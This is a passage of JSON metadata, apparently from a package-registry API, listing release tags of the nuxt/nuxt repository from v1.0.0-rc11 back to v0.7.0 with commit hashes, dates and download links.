t/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/Gi